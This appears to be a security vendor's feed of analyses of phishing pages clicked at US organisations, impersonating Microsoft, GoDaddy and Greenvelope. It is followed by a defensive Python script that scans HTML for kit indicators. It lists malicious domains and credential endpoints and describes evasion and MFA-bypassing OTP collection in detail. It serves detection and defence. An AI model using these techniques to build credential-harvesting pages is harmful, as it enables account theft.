Hosted on what appears to be a compromised UK scaffolding company domain (infoaescaffoldinq.co.uk), this represents an advanced phishing kit with real-time validation capabilities, animated loading screens to appear legitimate, and comprehensive Microsoft 365 authentication flow simulation including Authenticator app integration and SMS verification. The sophisticated obfuscation, multi-vector evasion techniques, and professional UI implementation suggest this is a high-quality phishing-as-a-service tool rather than a basic credential harvester.
On April 16, 2026, an employee at a Florida organization clicked the above phishing page. This GoDaddy-impersonating phishing page captures credentials through a JavaScript-obfuscated AJAX submission mechanism that uses jQuery's $.ajax() to POST email and password data to a validation endpoint, with the obfuscated code containing encoded strings and anti-analysis techniques including caps lock detection and honeypot fields positioned off-screen to evade bots. The page employs sophisticated social engineering by pre-populating a Florida organization's email address, mimicking authentic GoDaddy branding with legitimate logos and styling, and includes multi-stage validation with error handling that suggests real-time credential verification against legitimate services.
The infrastructure uses a suspicious domain "russelaiklinvestmentgroup.club" with an extremely long encoded URL path, and the heavily obfuscated JavaScript code contains security tokens, timestamps, and redirect mechanisms to random legitimate sites if honeypot fields are triggered. This represents a moderately sophisticated operation with advanced obfuscation techniques, anti-bot measures, and targeted personalization that goes well beyond basic form-based credential theft, indicating an organized phishing kit designed to evade automated detection while maximizing credential harvesting success rates.
On April 16, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page uses a sophisticated multi-stage credential capture mechanism that intercepts Microsoft OAuth flows by hosting malicious endpoints on the compromised domain "pacifcprime.com" (note the typo: "Pacifc" is missing the second "i" of "Pacific"). The primary credential capture method involves form POST submissions to "https://log1nhzkivbmlfm6lwmkc3e0afpak7.portal.pacifcprime.com/common/login" with extensive JavaScript configuration that mimics legitimate Microsoft authentication services, including OAuth state parameters, CSRF tokens (canary), and session management.
The page demonstrates advanced TTPs including legitimate Microsoft CDN resource loading (aadcdn.msauth.net) to appear authentic, comprehensive browser fingerprinting and device capability detection, and real-time credential validation infrastructure with multiple fallback endpoints for MSA and AAD authentication flows. The sophistication is notably high as it implements a complete OAuth flow interception system with proper state management, PKCE parameters, and even includes legitimate Microsoft branding assets and JavaScript frameworks, making it extremely difficult for users to distinguish from authentic Microsoft login pages.
On April 14, 2026 and April 15, 2026, employees at a Kentucky organization clicked the above phishing page. Looking at this HTML content, the primary credential capture method appears to be a traditional HTML form submission using POST requests to endpoints controlled by the threat actor, with the form action likely set dynamically via JavaScript (though the specific endpoint isn't visible in this static HTML). The page demonstrates sophisticated social engineering through detailed Microsoft Office 365/GoDaddy brand impersonation using extensive CSS styling and legitimate-looking logos (including base64-encoded images), creates urgency through a "Sharing Link Validation" theme, and employs evasion techniques including extensive CSS obfuscation and complex DOM manipulation to avoid detection.
The infrastructure leverages the compromised or malicious domain "feedingamerica.steadyoperations.de" which abuses the legitimate charity brand "Feeding America" to increase victim trust, while the sophisticated multi-brand impersonation (both Microsoft and GoDaddy elements present) suggests this is a moderate-to-advanced phishing kit designed to capture credentials from users who believe they're accessing a legitimate file sharing validation page. The presence of detailed form validation, professional styling with multiple CSS frameworks (Bootstrap, custom Microsoft-style components), and complex JavaScript frameworks indicates this is not a basic phishing attempt but rather a well-crafted credential harvesting operation.
On April 15, 2026, employees at a Minnesota organization clicked the above phishing page. Looking at the provided HTML content, this appears to be an incomplete phishing page that only contains Bootstrap CSS framework styling and basic HTML structure without any functional credential capture mechanisms. The HTML shows a standard login page template with the title "Sign in to your account" and extensive Bootstrap styling, but critically lacks any actual form elements, JavaScript code, or submission endpoints that would enable credential theft.
The URL uses a suspicious pattern, "coverupwindowwells.executionwithconfidence.de" followed by a random path "/jlv8J/#", which suggests a compromised or maliciously registered domain, but without the complete page content including form fields and submission logic, no active credential capture method can be identified. This is either an incomplete phishing kit deployment or a partially loaded page; as captured it is essentially non-functional and its sophistication level is basic, though the professional Bootstrap styling suggests the attackers intended to create a convincing Microsoft-like login interface once fully implemented.
On April 15, 2026, an employee at a Kentucky organization clicked the above phishing page. This Microsoft phishing page uses a sophisticated multi-stage credential harvesting approach that captures usernames, passwords, and 2FA codes through JavaScript form handling without visible form POST endpoints, suggesting real-time exfiltration via obfuscated external scripts (fWscvhBQB3xEJLf.js and ZIp3ZJXpQ34zkqRJ.js). The page employs advanced evasion techniques including randomized CSS class names throughout the code, anti-inspection protection that disables right-click and text selection, honeypot fields for bot detection, and base64-encoded configuration strings like "U2lnbi1pbiBvcHRpb25z" and "aHR0cHM6Ly9vdXRsb29rLm9mZmljZS5jb20=".
Notable social engineering elements include a realistic Microsoft authentication flow with loading animations, progressive credential collection mimicking legitimate MFA processes, and the domain "kenexacdmoorporation.click" targeting Kentucky organization users with personalized text "[email address from a Kentucky organization]". The sophistication level is advanced due to the comprehensive anti-analysis measures, multi-factor authentication simulation, and the use of external JavaScript files that likely contain the actual credential exfiltration logic while keeping the main HTML relatively clean of obvious malicious indicators.
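A defender-side triage script, added here as an example (it is not PhishID's tooling or any code from the kits described), that checks a page's HTML for the indicators these analyses keep repeating: base64-encoded configuration strings (the two quoted above decode to "Sign-in options" and "https://outlook.office.com"), off-screen honeypot inputs, right-click and text-selection suppression, and external scripts with long random names. The sample HTML, the honeypot field name and the script file name are constructed for the example.

```python
"""Flag phishing-kit indicators in captured page HTML (added example, not kit code)."""
import base64
import re

# Quoted literals made only of base64 characters, at least 12 chars long.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{12,}={0,2})[\"']")
# <input> elements pushed far off-screen, the honeypot placement described in the report.
OFFSCREEN_INPUT = re.compile(
    r"<input[^>]*style=\"[^\"]*(?:left|top):\s*-\d{3,}px[^\"]*\"[^>]*>", re.I)
# Right-click handler suppression or CSS text-selection suppression.
ANTI_INSPECT = re.compile(
    r"oncontextmenu\s*=\s*\"return false\"|user-select\s*:\s*none", re.I)
# External scripts whose file name is a long alphanumeric token (e.g. fWscvhBQB3xEJLf.js).
RANDOM_SCRIPT = re.compile(r"<script[^>]*\bsrc=\"(?:[^\"]*/)?([A-Za-z0-9]{14,}\.js)\"", re.I)


def decode_b64_strings(html):
    """Return (literal, decoded) pairs for literals that decode to printable ASCII."""
    found = []
    for lit in B64_LITERAL.findall(html):
        try:
            text = base64.b64decode(lit, validate=True).decode("ascii")
        except Exception:  # not valid base64, or not ASCII once decoded
            continue
        if text.isprintable():
            found.append((lit, text))
    return found


def scan_html(html):
    """Map each indicator name to the list of matches found in html."""
    return {
        "b64_config": decode_b64_strings(html),
        "offscreen_inputs": OFFSCREEN_INPUT.findall(html),
        "anti_inspect": ANTI_INSPECT.findall(html),
        "random_scripts": RANDOM_SCRIPT.findall(html),
    }


# Constructed sample in the style of the pages above; field and script names are hypothetical.
SAMPLE_HTML = """<body oncontextmenu="return false" style="user-select: none">
<input name="a_block_000" style="position:absolute;left:-9999px" tabindex="-1">
<script>var var_state_402="U2lnbi1pbiBvcHRpb25z";
var var_settings_955="aHR0cHM6Ly9vdXRsb29rLm9mZmljZS5jb20=";</script>
<script src="./fWscvhBQB3xEJLf.js"></script>
</body>"""

if __name__ == "__main__":
    for name, hits in scan_html(SAMPLE_HTML).items():
        print(f"{name}: {hits}")
```

A page that trips several of these indicators at once is worth a closer look; any single one (a decodable base64 string, say) is common on benign sites too.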
On April 14, 2026, an employee at a Georgia organization clicked the above phishing page. This sophisticated phishing page implements a multi-stage Microsoft authentication simulation with credential capture through JavaScript fetch requests to unspecified endpoints, incorporating obfuscated configuration data via base64 encoding (prop_text_730, var_info_828) and randomized CSS class names for evasion. The page features advanced social engineering tactics including realistic Microsoft branding, multi-factor authentication workflows (SMS codes, authenticator app verification), anti-bot honeypot fields (a_block_263), user-select disabling, and animated loading screens to increase perceived legitimacy.
Hosted on a suspicious domain (advancedmicrodevicesglobal.monivoeu.cfd) with Cloudflare protection, the kit demonstrates high sophistication through its modular JavaScript architecture, dynamic view transitions between authentication steps, real-time form validation, and comprehensive MFA token collection capabilities. The presence of security detection bypasses, extensive obfuscation, and professional UI animations indicates this is likely a commercial phishing-as-a-service kit rather than a basic credential harvester.
On April 10, 2026, employees at a Florida organization clicked the above phishing page. This phishing page uses a standard HTML form submission method for credential capture, posting to "./assets/login.php" when users enter their credentials. The page employs Microsoft brand impersonation with authentic-looking styling and uses the title "Sign in to your account" to mimic legitimate Microsoft login interfaces.
The infrastructure appears to be hosted on a German domain (visibilitydriven.de) with a subdirectory structure suggesting either compromised hosting or deliberate misdirection using a legitimate-sounding business domain. The sophistication level is basic, relying primarily on visual mimicry through Bootstrap CSS framework and standard form elements without any advanced JavaScript-based credential exfiltration, anti-analysis techniques, or real-time validation mechanisms. The most notable aspect is the clean, professional appearance that closely replicates Microsoft's authentication interface, making it potentially effective against less security-aware users despite its technical simplicity.
On April 10, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page captures Microsoft credentials through a standard form POST to "/common/login" on the same malicious domain (boncheumbrella.mom), while masquerading as a legitimate Microsoft sign-in page with sophisticated visual mimicry including authentic-looking CSS, JavaScript, and page structure copied from real Microsoft login infrastructure. The page employs several notable evasion techniques including DNS prefetching to legitimate Microsoft CDN domains (aadcdn.msauth.net, aadcdn.msftauth.net) to appear authentic, JavaScript-based browser capability detection and user-agent analysis, and multiple redirect URLs that point back to the malicious domain instead of legitimate Microsoft endpoints throughout the configuration object.
The infrastructure uses a suspicious domain (boncheumbrella.mom) but leverages legitimate Microsoft CSS and JavaScript frameworks to create a convincing replica, with the configuration containing authentic-looking OAuth parameters, session tokens, and Microsoft branding elements. This represents a moderate sophistication level due to the comprehensive replication of Microsoft's login interface and the clever redirect URL manipulation that maintains the illusion of legitimacy while capturing credentials locally.
On April 10, 2026, an employee at a Texas organization clicked the above phishing page. This phishing page uses a multi-stage credential capture technique where form data is first submitted via AJAX POST to "processmail.php" and subsequent OTP collection is handled by "process.php", implementing a sophisticated social engineering flow that mimics legitimate multi-factor authentication processes. The site impersonates Adobe's Greenvelope service while offering multiple email provider login options (Outlook, Office365, Yahoo, AOL) and employs several notable TTPs including forced error messaging ("Incorrect Password" on first attempt to appear legitimate), a realistic OTP collection workflow with countdown timer (5-minute window), and modal-based UI that prevents easy navigation away from the credential collection forms.
The page demonstrates moderate sophistication through its multi-stage JavaScript handling that simulates real authentication failures, dynamic content switching between different email providers, and the inclusion of fake loading animations and OTP delivery notifications to enhance credibility. The infrastructure appears to be hosted on a compromised or malicious domain (timefortheeventcard.nl) with Cloudflare protection, and the site includes commented-out AJAX code suggesting the attackers may still be developing or testing the exfiltration mechanisms.
On April 09, 2026, an employee at a Nevada organization clicked the above phishing page. This phishing page uses a standard HTML form POST method to capture credentials, submitting to "processmail.php" for initial login collection and "process.php" for OTP collection through a sophisticated multi-stage credential harvesting operation. The site impersonates Greenvelope (online invitations service) while targeting multiple email providers (Outlook, Office365, Yahoo, AOL) and employs a two-factor authentication bypass technique by collecting both passwords and SMS-based OTP codes through sequential modal dialogs with realistic timing delays and countdown timers.
The page demonstrates moderate sophistication with its multi-stage collection workflow, fake "incorrect password" error generation to encourage multiple attempts, automatic modal transitions with 5-second delays to simulate legitimate OTP delivery, and includes admin notification functionality via "notify_admin.php" when users request OTP resends. Notable technical elements include jQuery-based AJAX form submission with stage tracking (stage-one, stage-three classes), dynamic provider selection through data attributes, and Cloudflare hosting with beacon tracking, making this a well-engineered business email compromise tool designed to fully bypass modern MFA protections.
Learn how PhishID can help protect your district from cutting-edge threats like these! Schedule a Demo